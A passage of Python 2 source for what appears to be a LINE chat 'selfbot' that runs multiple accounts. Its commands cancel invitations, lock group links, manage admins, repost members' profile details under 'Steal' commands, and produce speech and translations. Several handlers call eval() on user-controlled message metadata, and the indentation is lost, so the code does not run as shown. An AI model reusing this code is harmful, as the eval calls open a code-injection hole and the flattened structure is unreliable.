group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif 'Creator' in msg.text.lower():
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"My Creator ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
elif "Vn-af " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-af ","")
tts = gTTS(psn, lang='af', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sq " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sq ","")
tts = gTTS(psn, lang='sq', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ar " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ar ","")
tts = gTTS(psn, lang='ar', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hy ","")
tts = gTTS(psn, lang='hy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-bn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-bn ","")
tts = gTTS(psn, lang='bn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ca " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ca ","")
tts = gTTS(psn, lang='ca', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zh " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zh ","")
tts = gTTS(psn, lang='zh', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhcn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhcn ","")
tts = gTTS(psn, lang='zh-cn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhtw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhtw ","")
tts = gTTS(psn, lang='zh-tw', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhyue " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhyue ","")
tts = gTTS(psn, lang='zh-yue', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hr ","")
tts = gTTS(psn, lang='hr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cs " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cs ","")
tts = gTTS(psn, lang='cs', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-da " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-da ","")
tts = gTTS(psn, lang='da', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-nl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-nl ","")
tts = gTTS(psn, lang='nl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-en " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-en ","")
tts = gTTS(psn, lang='en', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enau " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enau ","")
tts = gTTS(psn, lang='en-au', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enuk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enuk ","")
tts = gTTS(psn, lang='en-uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enus ","")
tts = gTTS(psn, lang='en-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eo " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eo ","")
tts = gTTS(psn, lang='eo', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fi ","")
tts = gTTS(psn, lang='fi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fr ","")
tts = gTTS(psn, lang='fr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-de " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-de ","")
tts = gTTS(psn, lang='de', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-el " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-el ","")
tts = gTTS(psn, lang='el', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hi ","")
tts = gTTS(psn, lang='hi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hu " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hu ","")
tts = gTTS(psn, lang='hu', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-is " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-is ","")
tts = gTTS(psn, lang='is', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-id " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-id ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-it " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-it ","")
tts = gTTS(psn, lang='it', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-jp " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-jp ","")
tts = gTTS(psn, lang='ja', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-km " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-km ","")
tts = gTTS(psn, lang='km', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ko " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ko ","")
tts = gTTS(psn, lang='ko', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-la " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-la ","")
tts = gTTS(psn, lang='la', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-lv " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-lv ","")
tts = gTTS(psn, lang='lv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-mk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-mk ","")
tts = gTTS(psn, lang='mk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-no " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-no ","")
tts = gTTS(psn, lang='no', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pl ","")
tts = gTTS(psn, lang='pl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pt " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pt ","")
tts = gTTS(psn, lang='pt', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ro " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ro ","")
tts = gTTS(psn, lang='ro', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ru " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ru ","")
tts = gTTS(psn, lang='ru', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sr ","")
tts = gTTS(psn, lang='sr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-si " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-si ","")
tts = gTTS(psn, lang='si', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sk ","")
tts = gTTS(psn, lang='sk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-es " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-es ","")
tts = gTTS(psn, lang='es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eses " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eses ","")
tts = gTTS(psn, lang='es-es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-esus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-esus ","")
tts = gTTS(psn, lang='es-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sv ","")
tts = gTTS(psn, lang='sv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ta " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ta ","")
tts = gTTS(psn, lang='ta', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-th " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-th ","")
tts = gTTS(psn, lang='th', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-tr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-tr ","")
tts = gTTS(psn, lang='tr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-uk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-uk ","")
tts = gTTS(psn, lang='uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-vi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-vi ","")
tts = gTTS(psn, lang='vi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cy ","")
tts = gTTS(psn, lang='cy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#=======================================================
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
#=======================================================
elif "Translate-arab " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-arab ","")
try:
translator = Translator()
trs = translator.translate(txt,'ar')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-korea " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-korea ","")
try:
translator = Translator()
trs = translator.translate(txt,'ko')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-chin " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-chin ","")
try:
translator = Translator()
trs = translator.translate(txt,'zh-cn')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-japan ","")
try:
translator = Translator()
trs = translator.translate(txt,'ja')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-thai ","")
try:
translator = Translator()
trs = translator.translate(txt,'th')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-idn ","")
try:
translator = Translator()
trs = translator.translate(txt,'id')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
translator = Translator()
trs = translator.translate(txt,'en')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Blockqr:off","blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
#≠≠================≠==================≠====≠===========!=======!==!
elif msg.text in ["Auto reinvite:off","auto reinvite:off"]:
if msg.from_ in admin:
if wait["autorein"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto reinvite:on","auto reinvite:on"]:
if msg.from_ in admin:
if wait["autorein"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to ,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
##≠========================&=&==&=&=%=%=%=%==%=%=%=%;%;%;;%;;%;%
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Blockqr:on","blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Denyinvites on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Denyinvites off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Shows offenders:on"]:
if msg.from_ in admin:
if wait["pelaku"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
else:
wait["pelaku"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
elif msg.text in ["Shows offenders:off"]:
if msg.from_ in admin:
if wait["pelaku"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable ")
else:
wait["pelaku"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable")
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#==========≠===============================
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already set to on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already set to off")
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
